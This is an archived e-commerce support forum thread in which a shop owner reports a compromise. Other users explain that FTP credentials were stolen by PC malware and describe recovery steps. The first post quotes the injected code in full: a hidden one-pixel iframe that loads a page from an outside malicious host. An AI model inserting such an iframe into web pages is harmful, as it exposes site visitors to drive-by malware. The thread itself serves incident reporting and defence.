Jump to content

Archived

This topic is now archived and is closed to further replies.

modelspecialist

code injected in my php files

Recommended Posts

I've noticed today that I've had a security breach last night; suddenly my admin login wouldn't work anymore. My browser also stated I needed a plugin all of a sudden to be able to show the page correctly, which got my spidey senses tingling..

 

I opened up the index.html file that forwarded visitors to the shop's index site, and found that the following code was injected at the bottom;

 

<iframe src="http://gratwall.vv.cc/showthread.php?t=80480463" width="1" height="1" frameborder="0"></iframe>

 

I'm not sure what it does but I'm quite confident that it's the source of my problem.

I'm reinstalling my shop (it's quite new so I don't have alot of work on it) but I still wanted to share this in case other people had the same problem.

Share this post


Link to post
Share on other sites

make sure that the backup that you are re-installing is also clean of the hack.

After you have done the re-install, your shop will still be hackable, so you need to plug that hole.


Help shape the future of Phoenix; join the Phoenix Club

Share this post


Link to post
Share on other sites

I've noticed today that I've had a security breach last night; suddenly...

Just a random passer by here, not related to oscommerce, (googled for "gratwall.vv.cc" and landed here), I had exactly the same thing on my sites today and had to reupload all infected index.* files.

The problem is in malware on your PC stealing ftp account data from your ftp client and sending to attacker's site. I got my PC infected from a warez website yesterday with this script. Before restoring files you should be sure you found and deleted that malware, otherwise all files on your website will be infected again within several hours (or days). Also, don't forget to change ftp password to your hosting afterwards.

Personally, I solved this problem by rewriting my entire disk C: from a backup disk image I keep at hand for such cases, afterwards changed ftp passwords and proceeded to restore original php and html files from backup folders.

Share this post


Link to post
Share on other sites

thanks for this info AntonPtisyn. I did indeed run a spyware check and my antivirus found a trojan horse in a file on my pc. I have no idea how it got there - anyway, it seems to work through the images folder; I found this in my htaccess file:

 

<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">

Order Deny,Allow

Deny from all

</FilesMatch>

Share this post


Link to post
Share on other sites

thanks for this info AntonPtisyn. I did indeed run a spyware check and my antivirus found a trojan horse in a file on my pc. I have no idea how it got there - anyway, it seems to work through the images folder; I found this in my htaccess file:<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$"> Order Deny,Allow Deny from all</FilesMatch>

 

 

That is suppose to be the .htaccess for the images directory. It prevents files from being executed from that directory.

 

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

×